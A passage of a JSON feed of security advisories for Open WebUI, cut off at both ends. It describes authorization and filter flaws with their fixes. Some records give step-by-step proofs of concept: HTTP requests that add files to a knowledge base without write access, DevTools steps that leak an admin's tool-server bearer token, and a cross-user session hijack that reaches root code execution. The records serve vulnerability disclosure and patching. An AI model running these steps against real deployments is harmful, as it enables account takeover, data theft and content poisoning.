0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qNjU3LW00YzQtMjRqcc4ABfsc/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xZzNmLTh4M2otZ2dmMs4ABfsb","url":"https://github.com/advisories/GHSA-qg3f-8x3j-ggf2","title":"Open WebUI: `WEB_FETCH_FILTER_LIST` host allow/block filter bypassable via URL path and non-label-boundary matching","description":"## Summary\n\nThe administrator-configured `WEB_FETCH_FILTER_LIST` (the allow/block list applied to server-side web fetches: RAG URL ingestion, URL-to-markdown, web-search content fetch) matches hostnames incorrectly, so the filter can be bypassed.\n\n## Details\n\n`is_string_allowed` (`backend/open_webui/utils/misc.py`) matches with `str.endswith(...)`, and the primary web-fetch call site (`backend/open_webui/retrieval/web/utils.py`) called it with the **full URL string**, not the hostname:\n\n- **Blocklist bypass via path.** A blocklist entry `!internal.example.com` only matches a URL that *ends with* that string. Any URL with a path (`https://internal.example.com/x`) ends with `/x`, so the entry never matches and the fetch proceeds. The blocklist effectively only stopped path-less URLs.\n- **Allowlist false-reject and bypass.** An allowlist `company.com` rejected the legitimate `https://api.company.com/status` and admitted `https://attacker.example/path/company.com`.\n- **Non-label-boundary matching** at the hostname-shaped call site (`retrieval/web/main.py`): `endswith('corp.com')` also matched `evilcorp.com`, and `10.0.0.1` matched `110.0.0.1`.\n\n## Impact\n\nAn authenticated user able to trigger a server-side web fetch can reach hosts the administrator intended to block with `WEB_FETCH_FILTER_LIST`.\n\nOpen WebUI's primary SSRF protection is a separate, always-on guard that rejects any URL resolving to a non-global IP (`validate_url` and the connection-layer `_ssrf_safe_new_conn`, active whenever `ENABLE_RAG_LOCAL_WEB_FETCH` is off, the default). That guard is unaffected by this issue and continues to block loopback, RFC1918 and link-local addresses, including the `169.254.169.254` cloud-metadata endpoint. This bypass therefore does **not** grant access to those internal targets. What it defeats is the administrator's ability to block specific **publicly-resolvable** hosts (internal services reachable from the server over a public IP, e.g. split-horizon DNS or internal PaaS endpoints) and to enforce an allowlist. Fetched content is returned to the requester, so for hosts reachable from the server's network position this is a read/content-disclosure SSRF against the admin-blocked host.\n\n## Patch\n\nMatching is now performed on the parsed hostname using DNS label boundaries. A dedicated `is_host_allowed(host, ...)` matches an entry only when host and entry are equal or the entry is a parent domain (`host == entry or host.endswith('.' + entry)`), so `corp.com` matches `api.corp.com` but not `evilcorp.com`, and IP entries match only the identical address. Both web-fetch call sites pass the parsed hostname rather than the full URL. The generic `is_string_allowed` is retained unchanged for unrelated non-host filters.\n\n## Credit\n\nReported by @addcontent.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T20:49:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-qg3f-8x3j-ggf2","https://nvd.nist.gov/vuln/detail/CVE-2026-59223","https://github.com/open-webui/open-webui/pull/25949","https://github.com/open-webui/open-webui/commit/087878ce848a4d828012068b5997dac480f43656","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-qg3f-8x3j-ggf2"],"source_kind":"github","identifiers":["GHSA-qg3f-8x3j-ggf2","CVE-2026-59223"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T21:00:08.731Z","updated_at":"2026-09-03T03:00:53.977Z","epss_percentage":0.00383,"epss_percentile":0.31042,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xZzNmLTh4M2otZ2dmMs4ABfsb","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xZzNmLTh4M2otZ2dmMs4ABfsb","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xZzNmLTh4M2otZ2dmMs4ABfsb/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1naDdwLTc4eDYtanc2bc4ABfrT","url":"https://github.com/advisories/GHSA-gh7p-78x6-jw6m","title":"Open WebUI: /api/v1/channels/{id}/members exposes full user model including sensitive credentials","description":"### Summary\n\nThe channel members endpoint serializes and returns **full user models** for channel participants, including settings objects. A normal user in a DM can retrieve admin-only sensitive configuration such as webhook URLs and tool server key material (`settings.ui.toolServers[].key`), which is not available via standard user info APIs.\n\n### Details\n\nThe endpoint GET `/api/v1/channels/{id}/members` returns the full serialized user model for every member in the channel. In both the DM and non-DM code paths, the handler constructs the response with `[UserModelResponse(**user.model_dump(), is_active=...)]` and returns it as the users list. Because `UserModel` (`models/users.py`) includes a settings object (`UserSettings`) and arbitrary UI configuration (`settings.ui`), the endpoint exposes other users' sensitive configuration to any channel participant.\n\nPractically, a regular user who participates in a DM or group can call `/api/v1/channels/{id}/members` and receive other members' settings, including admin-only details such as webhook notification URLs and tool server configuration, including credential fields like `settings.ui.toolServers[].key`. These values are not returned by the normal user profile endpoints (e.g., `/api/v1/users/{user_id}/info`).\n\n### PoC\n\n1. Start a local Open WebUI instance\n2. Log in as admin and in the Admin Panel, go to Settings -\u003e General and check *Channels (Beta)*, then press Save.\n3. Create a low-privilege user in the Users tab\n4. Click on the admin's profile bottom left, Settings and Integrations. Then click the `+` after *Manage Tool Servers* to add some tool server with a secret Bearer token (eg. `KEY`)\n5. Log in as the attacker with the low-privilege account and create a new Direct Message channel with the admin user:\n\n\u003cimg width=\"690\" height=\"383\" alt=\"image\" src=\"https://github.com/user-attachments/assets/70208661-a0db-4457-9984-119056ca3daf\" /\u003e\n\n7. After creating, open DevTools with F12 and go to the Network tab. Then in the DM UI click on the *Users* icon top right to see the members. In the network tab, this should have triggered a `/api/v1/channels/{id}/members` request which responds with the `settings` key including `toolServers` and `key` values:\n\n\u003cimg width=\"1642\" height=\"577\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6639d982-a156-4e8b-861e-587d86d9b152\" /\u003e\n\nThe attacker has now leaked the admin's bearer token for the toolserver they configured.\n\n### Impact\n\nConditions for exploit: channels are enabled and an attacker has a low-privilege account.\n\nWebhook URLs and tool server configurations (including bearer keys) can be exfiltrated from any user.\n\n### Original Agent Report\n\n\u003cimg width=\"400\" alt=\"app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20440423 (4)\" src=\"https://github.com/user-attachments/assets/8415553a-9f1e-4f73-929c-aa0d18a101ca\" /\u003e","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T17:04:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.0,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-gh7p-78x6-jw6m","https://nvd.nist.gov/vuln/detail/CVE-2026-59222","https://github.com/open-webui/open-webui/commit/fbcdcf146b99b5002705060a8243eee769108f9e","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-gh7p-78x6-jw6m"],"source_kind":"github","identifiers":["GHSA-gh7p-78x6-jw6m","CVE-2026-59222"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.337Z","epss_percentage":0.00322,"epss_percentile":0.24544,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1naDdwLTc4eDYtanc2bc4ABfrT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1naDdwLTc4eDYtanc2bc4ABfrT","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.7.0, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1naDdwLTc4eDYtanc2bc4ABfrT/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03M3g1LWg5MncteGMyas4ABfrS","url":"https://github.com/advisories/GHSA-73x5-h92w-xc2j","title":"Open WebUI: Private channel messages can be disclosed through cross-channel thread parent_id binding","description":"## Summary\n\nA normal authenticated user can read the content of a message in a private channel they do not belong to. `GET /api/v1/channels/{id}/messages/{message_id}/thread` authorizes the caller against the URL channel, but the underlying thread lookup loads the thread *parent* by id and returns it without verifying the parent belongs to that channel. By requesting a thread in a channel they can access while supplying a victim channel's message id as the thread root, the attacker receives the victim message — content, channel id, and author.\n\n## Affected component\n\n- `backend/open_webui/models/messages.py` — `get_messages_by_parent_id()`\n- `backend/open_webui/routers/channels.py` — `get_channel_thread_messages()` (read), `new_message_handler()` (parent/reply binding on write)\n\n## Root cause\n\n`get_messages_by_parent_id(channel_id, parent_id)` filters the thread *replies* by `channel_id`, but loads the thread *parent* by id alone and appends it without requiring `parent.channel_id == channel_id`:\n\n```python\nmessage = await db.get(Message, parent_id)     # loaded by id only — no channel binding\nif not message:\n    return []\n# replies are filtered by channel_id ...\nif len(all_messages) \u003c limit:\n    all_messages.append(message)               # parent appended unconditionally\n```\n\n`get_channel_thread_messages()` authorizes only the URL channel, then calls `get_messages_by_parent_id(id, message_id)` with the caller-supplied `message_id`. The reply insert path (`new_message_handler` → `insert_new_message`) also stored a caller-supplied `parent_id` without binding it to the channel.\n\n## Impact\n\nA non-member can disclose the content (plus channel id and author metadata) of a private-channel message whose id they know or obtain. Direct reads of the victim channel/message/thread return 403; the disclosure is via the thread parent of a channel the attacker can access. Read-only, one message per known id.\n\n## Proof of Concept\n\n(reporter) Validated on v0.9.6: `GET /channels/{attacker_channel}/messages/{victim_message_id}/thread` returned the victim's private message — content, victim channel id, and author — although direct reads of the victim channel returned 403.\n\n## Fix\n\nBind the thread parent to the requested channel: `get_messages_by_parent_id` returns `[]` unless the parent exists and `parent.channel_id == channel_id`. Defence-in-depth on the write path: `new_message_handler` rejects a supplied `parent_id`/`reply_to_id` whose message does not belong to the URL channel.\n\n## Affected / Patched\n\n- Affected: `\u003c 0.10.0` (last affected release 0.9.6)\n- Patched: v0.10.0 (PR #25766). `get_messages_by_parent_id` binds the thread parent to the requested channel (returns `[]` unless `parent.channel_id == channel_id`), and `new_message_handler` rejects a caller-supplied `parent_id`/`reply_to_id` whose message does not belong to the channel.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-07-24T17:04:31.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-73x5-h92w-xc2j","https://nvd.nist.gov/vuln/detail/CVE-2026-59215","https://github.com/open-webui/open-webui/pull/25766","https://github.com/open-webui/open-webui/commit/a66477b7104c5d141ce7bffaea424b43e7666ef1","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-73x5-h92w-xc2j"],"source_kind":"github","identifiers":["GHSA-73x5-h92w-xc2j","CVE-2026-59215"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.338Z","epss_percentage":0.00323,"epss_percentile":0.2457,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03M3g1LWg5MncteGMyas4ABfrS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03M3g1LWg5MncteGMyas4ABfrS","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03M3g1LWg5MncteGMyas4ABfrS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zd3AzLXh4ajktNWpxcc4ABfrR","url":"https://github.com/advisories/GHSA-3wp3-xxj9-5jqq","title":"Open WebUI: Cross-user model-list exposure via static cache key in get_all_models (aiocache key= vs key_builder= misuse)","description":"## Summary\n\nThe `get_all_models` handlers in `routers/openai.py` and `routers/ollama.py` intended to cache their **permission-filtered** model lists per user, but the `@cached` decorator was misconfigured: it passed a `key=` lambda instead of `key_builder=`. In aiocache 0.12.3 (the pinned version), `key=` is a **static** cache key — a callable passed there is used as a constant object, not invoked per call. As a result the per-user key was never computed, and all callers collided onto a single shared cache entry within the TTL window. During that window, one user's permission-filtered model list could be served to a different authenticated user, crossing the per-user authorization boundary.\n\n## Impact\n\n- **Boundary crossed:** Confidentiality (cross-user). A caller can receive the model list scoped to a *different* security principal than themselves.\n- A user (or admin, or — depending on endpoint reachability — anonymous caller) who populates the cache causes the next caller within the TTL to receive *that* list rather than their own permission-filtered one.\n- What's disclosed is the set of models another principal can access, including potentially the existence and naming of models restricted from the receiving user.\n- Exposure is **incidental and timing-dependent**, not attacker-controlled: the leaked entry is whatever the most recent caller populated within `MODELS_CACHE_TTL` (default 1 second), and the attacker cannot select the victim or force a target's list into the cache.\n\n## Affected component\n\n- `backend/open_webui/routers/openai.py` — `get_all_models` (~line 488)\n- `backend/open_webui/routers/ollama.py` — `get_all_models` (~line 302)\n\nBoth decorated with `@cached(ttl=MODELS_CACHE_TTL, key=lambda ...)`. No other `@cached(... key=lambda ...)` misuse was found elsewhere in the backend.\n\n## Root cause\n\naiocache 0.12's `@cached` treats `key=` as a static key; the per-call hook is `key_builder=` with signature `key_builder(func, *args, **kwargs)`. Passing a callable to `key=` uses the callable object itself as a constant key, so every invocation resolved to the same entry and the intended per-`user.id` namespacing never occurred.\n\n## Reproduction (default config)\n\n1. On a default deployment, configure at least two users with *different* model-access permissions (e.g. one model restricted to user A).\n2. As user A, request the model list (populates the shared cache entry).\n3. Within `MODELS_CACHE_TTL` (default 1s), as user B, request the model list.\n4. User B receives user A's permission-filtered list, including models B is not permitted to see.\n\n## Remediation\n\nReplace `key=` with `key_builder=` at both call sites and adjust the lambda to take the function as its first argument:\n\n```python\n@cached(\n    ttl=MODELS_CACHE_TTL,\n    key_builder=lambda _func, request, user=None: (\n        f'openai_all_models_{user.id}' if user else 'openai_all_models'\n    ),\n)\n```","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-07-24T17:03:21.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3wp3-xxj9-5jqq","https://nvd.nist.gov/vuln/detail/CVE-2026-59213","https://github.com/open-webui/open-webui/pull/25783","https://github.com/open-webui/open-webui/commit/0fc630b34b2899599dabffffa012afd47599aa75","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-3wp3-xxj9-5jqq"],"source_kind":"github","identifiers":["GHSA-3wp3-xxj9-5jqq","CVE-2026-59213"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.339Z","epss_percentage":0.00297,"epss_percentile":0.21906,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zd3AzLXh4ajktNWpxcc4ABfrR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zd3AzLXh4ajktNWpxcc4ABfrR","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.6.27, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zd3AzLXh4ajktNWpxcc4ABfrR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03cjd4LWdqdnItNDQ4Z84ABfrQ","url":"https://github.com/advisories/GHSA-7r7x-gjvr-448g","title":"Open WebUI: Upload `metadata.knowledge_id` bypasses the knowledge-base write-access check (read-only users can add files to KB)","description":"# Open WebUI upload metadata can add files to knowledge bases without write permission\n\n## Summary\n\nOpen WebUI's file upload background processing trusts the client-supplied `metadata.knowledge_id` value and inserts a `knowledge_file` association before validating that the uploading user has write access to the target knowledge base.\n\nA verified user with only read access to a knowledge base can upload an arbitrary file and set `metadata={\"knowledge_id\":\"\u003ctarget knowledge id\u003e\"}`. The normal `/api/v1/knowledge/{id}/file/add` endpoint correctly requires knowledge-base write access, but the upload auto-link path bypasses that authorization check.\n\nThe immediate result is unauthorized modification of the target knowledge base's file membership. The attached attacker-controlled file becomes visible through `/api/v1/knowledge/{id}/files`, and readers/owners of that knowledge base can retrieve the file through the normal file endpoints because file access is derived from `KnowledgeFile` membership.\n\n## Affected Version\n\n- Repository: `open-webui/open-webui`\n- Tested source commit: `02dc3e689ceac915a870b373318b99c029ddf603`\n- Package version observed in `package.json`: `0.9.6`\n- Package name: `open-webui`\n\n## Impact\n\nA read-only knowledge-base collaborator can perform a write operation against that knowledge base by attaching arbitrary uploaded files.\n\nSecurity impact:\n\n- Unauthorized knowledge-base membership modification.\n- Integrity impact on shared knowledge-base file listings.\n- Attacker-controlled files become readable to other users who can read the target knowledge base.\n- If an owner/admin later reprocesses or globally reindexes the knowledge base, the unauthorized file can be indexed into the knowledge collection, turning the membership bypass into RAG/content poisoning.\n\nThis is not an unauthenticated issue. It requires a verified Open WebUI account and a valid target knowledge-base ID. The clearest exploit path is a user who legitimately has read access to a knowledge base but not write access.\n\n## Source Evidence\n\nThe normal single-file knowledge add endpoint checks write permission before processing or inserting the relationship:\n\n- `backend/open_webui/routers/knowledge.py`\n- `add_file_to_knowledge_by_id`\n- Lines 714-728 reject callers who are not owner, admin, or granted `write` access.\n- Lines 750-766 then process and insert the file only after that authorization gate.\n\nThe upload auto-link path does not perform the same check:\n\n- `backend/open_webui/routers/files.py`\n- `process_uploaded_file`\n- Lines 178-186 read `knowledge_id` from upload metadata and immediately call `Knowledges.add_file_to_knowledge_by_id(...)`.\n- Lines 187-192 call `process_file(... collection_name=knowledge_id ...)` after the insert.\n\nThe model method inserts the relationship without validating the caller's write access to the knowledge base:\n\n- `backend/open_webui/models/knowledge.py`\n- `add_file_to_knowledge_by_id`\n- Lines 646-677 create and commit a `KnowledgeFile` row for the supplied `knowledge_id`, `file_id`, and `user_id`.\n\nThe later vector write check exists, but it runs too late:\n\n- `backend/open_webui/routers/retrieval.py`\n- `process_file`\n- Lines 1587-1592 call `_validate_collection_access(..., access_type='write')` when a collection is supplied.\n\nBecause the unauthorized `KnowledgeFile` row is already committed before that check runs, the failed vector processing does not undo the knowledge-base file association. The upload code catches the exception at `backend/open_webui/routers/files.py` lines 194-195 and logs a warning while leaving the row in place.\n\nThe unauthorized relationship affects file access decisions:\n\n- `backend/open_webui/utils/access_control/files.py`\n- `has_access_to_file`\n- Lines 41-53 grant file access when a file is associated with a knowledge base the user can access.\n\nSo once the attacker's file is inserted into the target `KnowledgeFile` table, target knowledge-base readers/owners can see and fetch that file through normal knowledge/file routes.\n\n## Reproduction Steps\n\nUse a local Open WebUI instance with two verified users:\n\n1. As user `owner`, create a knowledge base.\n2. Grant user `reader` read access to the knowledge base, but do not grant write access.\n3. As `reader`, confirm the normal add-file endpoint is blocked:\n\n```http\nPOST /api/v1/knowledge/\u003cknowledge_id\u003e/file/add\nAuthorization: Bearer \u003creader token\u003e\nContent-Type: application/json\n\n{\"file_id\":\"\u003creader-owned-file-id\u003e\"}\n```\n\nExpected and observed behavior for the normal route: it rejects the request because `reader` lacks knowledge-base write access.\n\n4. As `reader`, upload a new file with the same target knowledge ID embedded in upload metadata:\n\n```http\nPOST /api/v1/files/?process=true\u0026process_in_background=false\nAuthorization: Bearer \u003creader token\u003e\nContent-Type: multipart/form-data\n\nfile=@attacker-note.txt\nmetadata={\"knowledge_id\":\"\u003cknowledge_id\u003e\"}\n```\n\n5. Observe that the upload request succeeds and returns the uploaded file record.\n6. As `owner`, request the knowledge-base files:\n\n```http\nGET /api/v1/knowledge/\u003cknowledge_id\u003e/files\nAuthorization: Bearer \u003cowner token\u003e\n```\n\n7. Observe that `attacker-note.txt` appears in the target knowledge base even though `reader` did not have write access.\n8. As `owner`, request the file content:\n\n```http\nGET /api/v1/files/\u003cattacker_file_id\u003e/content\nAuthorization: Bearer \u003cowner token\u003e\n```\n\n9. Observe that the file is retrievable because `has_access_to_file` derives access from the unauthorized knowledge-base membership.\n\n## Expected Behavior\n\nThe upload auto-link path should enforce the same authorization contract as `/api/v1/knowledge/{id}/file/add`:\n\n- The target knowledge base must exist.\n- The caller must be the knowledge owner, an admin, or have `write` access.\n- The supplied `directory_id`, if present, must belong to the target knowledge base.\n- The `KnowledgeFile` association should only be inserted after authorization and processing succeed.\n\n## Actual Behavior\n\n`metadata.knowledge_id` causes `Knowledges.add_file_to_knowledge_by_id(...)` to insert a `KnowledgeFile` row before write authorization is checked. The later collection write validation can fail, but the unauthorized membership row remains committed.\n\n## Suggested Fix\n\nMove knowledge-base authorization before the insert in the upload auto-link path. The upload path should share the same write-access and directory validation logic used by the dedicated knowledge endpoints.\n\nOne safe pattern:\n\n1. Load the target knowledge base.\n2. Require owner/admin/write access before calling `Knowledges.add_file_to_knowledge_by_id`.\n3. Validate that `directory_id`, if supplied, belongs to the same knowledge base.\n4. Run vector processing before inserting the membership row, or wrap processing plus insertion in a transaction/compensating cleanup so a denied or failed process cannot leave a stale unauthorized row.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T17:02:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-7r7x-gjvr-448g","https://nvd.nist.gov/vuln/detail/CVE-2026-59217","https://github.com/open-webui/open-webui/pull/26001","https://github.com/open-webui/open-webui/commit/b7626f05fb92b24ab923ad81a037071ebd5623d1","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-7r7x-gjvr-448g"],"source_kind":"github","identifiers":["GHSA-7r7x-gjvr-448g","CVE-2026-59217"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.340Z","epss_percentage":0.00372,"epss_percentile":0.29891,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03cjd4LWdqdnItNDQ4Z84ABfrQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03cjd4LWdqdnItNDQ4Z84ABfrQ","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03cjd4LWdqdnItNDQ4Z84ABfrQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03NGgzLWN4cTctdmM1cc4ABfrP","url":"https://github.com/advisories/GHSA-74h3-cxq7-vc5q","title":"Open WebUI: Cross-user code-interpreter and tool execution via unvalidated Socket.IO event-caller session_id","description":"## Summary\n\nAn authenticated low-privilege user can execute arbitrary code-interpreter Python and tools inside **another** user's authenticated session. The Socket.IO event-caller (`get_event_call`) delivers `execute:python` / `execute:tool` events to a **client-supplied** `session_id` after only checking that the session is connected, never that it belongs to the requester. Combined with `ydoc:document:join`, which exposes the live socket ids of everyone in a shared note's collaboration room to any read-access participant, an attacker can target a victim's session and run attacker-chosen code/tools in the victim's browser context. When the victim is an administrator, that hijacked context reaches the admin-only Functions API, whose source is executed server-side, yielding remote code execution as the server process (root in the default container).\n\n## Affected component\n\n- `backend/open_webui/socket/main.py` — `get_event_call()` / `__event_caller__`\n- `backend/open_webui/main.py` — chat-completion metadata (`session_id` taken from the request body)\n\n## Root cause\n\nThe event-caller routes to a caller-controlled session id with no ownership check:\n\n```python\n# backend/open_webui/socket/main.py — get_event_call()\nasync def __event_caller__(event_data):\n    session_id = request_info['session_id']\n    if session_id not in SESSION_POOL:                 # only checks the session is connected\n        return {'error': 'Client session disconnected.'}\n    return await sio.call('events', {...}, to=session_id, ...)   # delivered to that sid\n```\n\n`session_id` originates from the request body and is never validated against the authenticated user:\n\n```python\n# backend/open_webui/main.py\nmetadata = {\n    'user_id': user.id,                               # server-derived (trustworthy)\n    'session_id': form_data.pop('session_id', None),  # client-controlled\n    ...\n}\n```\n\n`SESSION_POOL[session_id]` is the user record of whoever owns that socket. Because the caller checks only membership (`in SESSION_POOL`), a request carrying another user's `session_id` causes `execute:python` / `execute:tool` to be delivered to that other user's browser.\n\n## Reachability\n\n- `execute:python` / `execute:tool` are emitted from the code-interpreter and tool-call paths (`utils/middleware.py`, `tools/builtin.py`), all routed through `get_event_call`.\n- The victim's live `session_id` is disclosed to any read-access participant of a shared note via `ydoc:document:join`.\n- `POST /api/v1/chat/completions` requires only `get_verified_user` (the default user role). The attacker uses their own account and a model / Direct Connection they control to choose the payload.\n\n## Impact\n\n- **Any victim:** arbitrary code-interpreter Python and tool execution in the victim's authenticated session — the attacker acts with the victim's identity and origin (full session/account compromise).\n- **Admin victim:** the hijacked admin context reaches `POST /api/v1/functions/create`, whose source is `exec()`'d server-side → remote code execution as the server process (root in the default container).\n\nThe Functions API is intended administrator code-execution; the vulnerability here is the cross-user delivery that lets an attacker drive another user's session — including an admin's — into it. The primitive is a full session compromise even against non-admin victims.\n\n## Proof of Concept\n\nThe reporter's `exploit.py` reproduced on `ghcr.io/open-webui/open-webui:0.9.6` and a build of the `v0.9.6` tag, confirming blind server-side RCE out-of-band (callback returns `uid=0(root)`), using only a low-privilege `user` account that shared a note with an admin victim. Preconditions: code interpreter enabled; attacker shares a note with the victim; victim opens it while online; admin victim required for server RCE.\n\n## Fix\n\n`get_event_call` must verify the target session belongs to the requesting user before delivering, not merely that it is connected:\n\n```python\nsession = SESSION_POOL.get(session_id)\nif session is None or session.get('id') != request_info.get('user_id'):\n    return {'error': 'Client session disconnected.'}\n```\n\n`user_id` in the request metadata is server-derived from the authenticated user, so it is trustworthy. Restricting `ydoc:document:join` so it does not disclose other participants' socket ids is recommended as defence-in-depth.\n\n## Affected / Patched\n\n- Affected: `\u003c 0.10.0` (last affected release 0.9.6)\n- Patched: v0.10.0. `get_event_call` now verifies the target session belongs to the requesting user before delivering (`session is None or session.get('id') != request_info.get('user_id')`), using the server-derived `user_id` from the request metadata. The recommended `ydoc:document:join` sid-disclosure restriction is defence-in-depth and independent of this fix; the ownership check closes the cross-user delivery regardless of whether the victim's sid is known.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T17:01:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-74h3-cxq7-vc5q","https://nvd.nist.gov/vuln/detail/CVE-2026-59216","https://github.com/open-webui/open-webui/pull/25763","https://github.com/open-webui/open-webui/commit/386ac958144dbbbf0aa6e268070d72b681a318aa","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-74h3-cxq7-vc5q"],"source_kind":"github","identifiers":["GHSA-74h3-cxq7-vc5q","CVE-2026-59216"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.341Z","epss_percentage":0.00308,"epss_percentile":0.22937,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NGgzLWN4cTctdmM1cc4ABfrP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03NGgzLWN4cTctdmM1cc4ABfrP","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NGgzLWN4cTctdmM1cc4ABfrP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14MmZmLXY1djgtbTc1bc4ABfrO","url":"https://github.com/advisories/GHSA-x2ff-v5v8-m75m","title":"Open WebUI: Cross-channel message overwrite via chat completion API (single-model and multimodel message_ids)","description":"## Summary\n\nAny authenticated user can overwrite the content of a message in a channel they do not belong to (including private and DM channels) by sending a chat completion request with a `channel:`-prefixed `chat_id` and a target `message_id`. The `channel:` path routes pipeline output through `_make_channel_emitter`, which writes to the `Messages` table using the caller-supplied `message_id` without binding it to the channel.\n\nThis advisory consolidates two filings of the same flaw: the original single-model form, and a multimodel `message_ids` variant that survives the partial fix shipped in v0.9.6 (see \"Fix status\" below).\n\n## Details (as introduced in v0.9.5)\n\nWhen a user submits a chat completion request with a `chat_id` starting with `channel:`, three authorization gaps combined in v0.9.5:\n\n1. **Ownership check skipped** (`main.py`): the `channel:` prefix caused the entire ownership/membership verification block to be skipped, with no channel membership/write check replacing it.\n\n```python\nif not chat_id.startswith('local:') and not chat_id.startswith('channel:'):  # temporary/channel chats are not stored\n    if is_new_chat:\n        ...\n    else:\n        if not await 